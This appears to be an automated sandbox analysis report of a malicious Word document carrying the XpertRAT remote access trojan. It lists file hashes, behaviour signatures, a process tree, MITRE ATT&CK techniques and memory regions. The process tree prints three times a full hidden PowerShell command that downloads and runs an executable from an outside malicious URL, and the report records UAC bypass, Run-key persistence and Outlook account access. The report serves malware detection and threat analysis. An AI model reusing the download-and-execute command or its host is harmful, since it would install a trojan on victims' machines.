Analysis

  • max time kernel
    149s
  • max time network
    178s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    15-10-2021 10:45

General

  • Target

    img_Bestelling 0020211015.doc

  • Size

    422KB

  • MD5

    115cb391afa5ed68f040ec69b00c84c1

  • SHA1

    319cea32abbb8ef0a55fff174dafdea4d3a7b0c7

  • SHA256

    2716bdd86f5e2a5364c1dd061a36270bf8eade4838e0e0e08677093bc0b8d910

  • SHA512

    077c977bd8e08579e9f2f85b7077dbe869b1ac0359d40d463b0a7dda28b0a297222e44386b62fff4b04367513286e8fe755352cca59d1c2ce78e306b310e7879

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

httP://avira.ydns.eu/EXCEL.exe

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs
  • Windows security bypass 2 TTPs
  • XpertRAT

    XpertRAT is a remote access trojan with various capabilities.

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\img_Bestelling 0020211015.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1340
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Users\Admin\AppData\Roaming\EXCEL.exe
        "C:\Users\Admin\AppData\Roaming\EXCEL.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1600
        • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          4⤵
          • Executes dropped EXE
          PID:1464
        • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
          4⤵
          • Executes dropped EXE
          • Windows security modification
          • Checks whether UAC is enabled
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:1104
          • C:\Program Files (x86)\Internet Explorer\iexplore.exe
            C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            5⤵
            • Adds policy Run key to start application
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:560
            • C:\Windows\SysWOW64\notepad.exe
              notepad.exe
              6⤵
                PID:1928
              • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                /stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\eseeuzmae0.txt"
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1652
              • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                /stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\eseeuzmae1.txt"
                6⤵
                • Accesses Microsoft Outlook accounts
                PID:1604
              • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                /stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\eseeuzmae2.txt"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:1816
              • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                /stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\eseeuzmae3.txt"
                6⤵
                  PID:1708
                • C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  /stext "C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\eseeuzmae4.txt"
                  6⤵
                    PID:1936
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
            2⤵
            • Process spawned unexpected child process
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1416
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://avira.ydns.eu/EXCEL.exe','C:\Users\Admin\AppData\Roaming\EXCEL.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\EXCEL.exe'"
            2⤵
            • Process spawned unexpected child process
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:960
          • C:\Windows\splwow64.exe
            C:\Windows\splwow64.exe 12288
            2⤵
              PID:1764

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          Registry Run Keys / Startup Folder

          2
          T1060

          Privilege Escalation

          Bypass User Account Control

          1
          T1088

          Defense Evasion

          Bypass User Account Control

          1
          T1088

          Disabling Security Tools

          3
          T1089

          Modify Registry

          7
          T1112

          Discovery

          System Information Discovery

          1
          T1082

          Collection

          Email Collection

          1
          T1114

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            MD5

            7560b03d9721036181565287e85d9525

            SHA1

            447c0d915c9236b5f3221bfbe05e5b57785d3142

            SHA256

            f2926aaea4603961e15c9ac92eb599ddd51bd6e19bd7fded285a1db16753db87

            SHA512

            fb38977856b6d4702b1793916c90b0b595dc8881457d6a2a98ba488f80e444314a5e1cdaa0f6a741e6c12b129195fd04f499d84a4cca32386c64fe58ccdfe583

          • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            MD5

            7560b03d9721036181565287e85d9525

            SHA1

            447c0d915c9236b5f3221bfbe05e5b57785d3142

            SHA256

            f2926aaea4603961e15c9ac92eb599ddd51bd6e19bd7fded285a1db16753db87

            SHA512

            fb38977856b6d4702b1793916c90b0b595dc8881457d6a2a98ba488f80e444314a5e1cdaa0f6a741e6c12b129195fd04f499d84a4cca32386c64fe58ccdfe583

          • C:\Users\Admin\AppData\Local\Temp\EXCEL.exe
            MD5

            7560b03d9721036181565287e85d9525

            SHA1

            447c0d915c9236b5f3221bfbe05e5b57785d3142

            SHA256

            f2926aaea4603961e15c9ac92eb599ddd51bd6e19bd7fded285a1db16753db87

            SHA512

            fb38977856b6d4702b1793916c90b0b595dc8881457d6a2a98ba488f80e444314a5e1cdaa0f6a741e6c12b129195fd04f499d84a4cca32386c64fe58ccdfe583

          • C:\Users\Admin\AppData\Roaming\EXCEL.exe
            MD5

            7560b03d9721036181565287e85d9525

            SHA1

            447c0d915c9236b5f3221bfbe05e5b57785d3142

            SHA256

            f2926aaea4603961e15c9ac92eb599ddd51bd6e19bd7fded285a1db16753db87

            SHA512

            fb38977856b6d4702b1793916c90b0b595dc8881457d6a2a98ba488f80e444314a5e1cdaa0f6a741e6c12b129195fd04f499d84a4cca32386c64fe58ccdfe583

          • C:\Users\Admin\AppData\Roaming\EXCEL.exe
            MD5

            7560b03d9721036181565287e85d9525

            SHA1

            447c0d915c9236b5f3221bfbe05e5b57785d3142

            SHA256

            f2926aaea4603961e15c9ac92eb599ddd51bd6e19bd7fded285a1db16753db87

            SHA512

            fb38977856b6d4702b1793916c90b0b595dc8881457d6a2a98ba488f80e444314a5e1cdaa0f6a741e6c12b129195fd04f499d84a4cca32386c64fe58ccdfe583

          • C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\eseeuzmae2.txt
            MD5

            f3b25701fe362ec84616a93a45ce9998

            SHA1

            d62636d8caec13f04e28442a0a6fa1afeb024bbb

            SHA256

            b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

            SHA512

            98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

          • C:\Users\Admin\AppData\Roaming\L3Q7J4T2-J8A6-L6O4-W4G3-U5J7D0W2W5F0\eseeuzmae4.txt
            MD5

            f3b25701fe362ec84616a93a45ce9998

            SHA1

            d62636d8caec13f04e28442a0a6fa1afeb024bbb

            SHA256

            b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

            SHA512

            98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            MD5

            0f6004116816eb71af8da5ee9c4b4674

            SHA1

            f374e9cc014e01d4a03304689858c869e4d86641

            SHA256

            a636ebdf2b9f279768c43f71ff70942c845a47b55617cecfc7a8b18b27e7da2d

            SHA512

            c61364f7636e45c73cce04ac19385ee174c2a57f4e6dd80f521fbbe5192b3fbd1813b2868d5a5bf23c3d328a97f5d37217695d19051ec1a46968df0af27d38d8

          • \Users\Admin\AppData\Local\Temp\EXCEL.exe
            MD5

            7560b03d9721036181565287e85d9525

            SHA1

            447c0d915c9236b5f3221bfbe05e5b57785d3142

            SHA256

            f2926aaea4603961e15c9ac92eb599ddd51bd6e19bd7fded285a1db16753db87

            SHA512

            fb38977856b6d4702b1793916c90b0b595dc8881457d6a2a98ba488f80e444314a5e1cdaa0f6a741e6c12b129195fd04f499d84a4cca32386c64fe58ccdfe583

          • \Users\Admin\AppData\Local\Temp\EXCEL.exe
            MD5

            7560b03d9721036181565287e85d9525

            SHA1

            447c0d915c9236b5f3221bfbe05e5b57785d3142

            SHA256

            f2926aaea4603961e15c9ac92eb599ddd51bd6e19bd7fded285a1db16753db87

            SHA512

            fb38977856b6d4702b1793916c90b0b595dc8881457d6a2a98ba488f80e444314a5e1cdaa0f6a741e6c12b129195fd04f499d84a4cca32386c64fe58ccdfe583

          • \Users\Admin\AppData\Roaming\EXCEL.exe
            MD5

            7560b03d9721036181565287e85d9525

            SHA1

            447c0d915c9236b5f3221bfbe05e5b57785d3142

            SHA256

            f2926aaea4603961e15c9ac92eb599ddd51bd6e19bd7fded285a1db16753db87

            SHA512

            fb38977856b6d4702b1793916c90b0b595dc8881457d6a2a98ba488f80e444314a5e1cdaa0f6a741e6c12b129195fd04f499d84a4cca32386c64fe58ccdfe583

          • memory/560-97-0x0000000000401364-mapping.dmp
          • memory/960-73-0x0000000002560000-0x00000000031AA000-memory.dmp
            Filesize

            12.3MB

          • memory/960-69-0x0000000004B30000-0x0000000005181000-memory.dmp
            Filesize

            6.3MB

          • memory/960-71-0x0000000002560000-0x00000000031AA000-memory.dmp
            Filesize

            12.3MB

          • memory/960-63-0x0000000000000000-mapping.dmp
          • memory/1104-87-0x0000000000400000-0x000000000042C000-memory.dmp
            Filesize

            176KB

          • memory/1104-96-0x00000000000A0000-0x00000000000AA000-memory.dmp
            Filesize

            40KB

          • memory/1104-94-0x00000000000A0000-0x00000000000A6000-memory.dmp
            Filesize

            24KB

          • memory/1104-91-0x00000000004010B8-mapping.dmp
          • memory/1104-90-0x0000000000400000-0x000000000042C000-memory.dmp
            Filesize

            176KB

          • memory/1104-89-0x0000000000400000-0x000000000042C000-memory.dmp
            Filesize

            176KB

          • memory/1104-88-0x0000000000400000-0x000000000042C000-memory.dmp
            Filesize

            176KB

          • memory/1340-56-0x00000000767F1000-0x00000000767F3000-memory.dmp
            Filesize

            8KB

          • memory/1340-53-0x0000000072DB1000-0x0000000072DB4000-memory.dmp
            Filesize

            12KB

          • memory/1340-55-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

          • memory/1340-54-0x0000000070831000-0x0000000070833000-memory.dmp
            Filesize

            8KB

          • memory/1416-72-0x0000000002470000-0x00000000030BA000-memory.dmp
            Filesize

            12.3MB

          • memory/1416-62-0x0000000000000000-mapping.dmp
          • memory/1416-70-0x0000000002470000-0x00000000030BA000-memory.dmp
            Filesize

            12.3MB

          • memory/1416-68-0x0000000004DD0000-0x0000000005421000-memory.dmp
            Filesize

            6.3MB

          • memory/1444-57-0x0000000000000000-mapping.dmp
          • memory/1444-67-0x0000000004B80000-0x00000000051D1000-memory.dmp
            Filesize

            6.3MB

          • memory/1444-59-0x0000000002280000-0x0000000002ECA000-memory.dmp
            Filesize

            12.3MB

          • memory/1444-60-0x0000000002280000-0x0000000002ECA000-memory.dmp
            Filesize

            12.3MB

          • memory/1444-61-0x0000000002280000-0x0000000002ECA000-memory.dmp
            Filesize

            12.3MB

          • memory/1600-75-0x0000000000000000-mapping.dmp
          • memory/1600-78-0x0000000000EA0000-0x0000000000EA1000-memory.dmp
            Filesize

            4KB

          • memory/1600-95-0x0000000004B50000-0x0000000004B51000-memory.dmp
            Filesize

            4KB

          • memory/1600-83-0x0000000000680000-0x00000000006B0000-memory.dmp
            Filesize

            192KB

          • memory/1600-82-0x0000000004A30000-0x0000000004B41000-memory.dmp
            Filesize

            1.1MB

          • memory/1604-101-0x0000000000411654-mapping.dmp
          • memory/1652-100-0x0000000000423BC0-mapping.dmp
          • memory/1708-104-0x0000000000413750-mapping.dmp
          • memory/1764-81-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmp
            Filesize

            8KB

          • memory/1764-80-0x0000000000000000-mapping.dmp
          • memory/1816-102-0x0000000000442F04-mapping.dmp
          • memory/1928-98-0x0000000000000000-mapping.dmp
          • memory/1936-105-0x000000000040C2A8-mapping.dmp